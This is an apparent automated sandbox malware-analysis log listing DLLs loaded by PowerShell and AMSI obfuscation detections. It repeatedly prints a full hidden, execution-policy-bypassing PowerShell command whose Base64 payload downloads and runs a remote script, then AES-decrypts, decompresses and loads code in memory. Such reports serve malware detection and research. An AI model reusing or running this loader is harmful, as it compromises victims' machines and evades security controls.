                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

                          Data Obfuscation

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicm
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5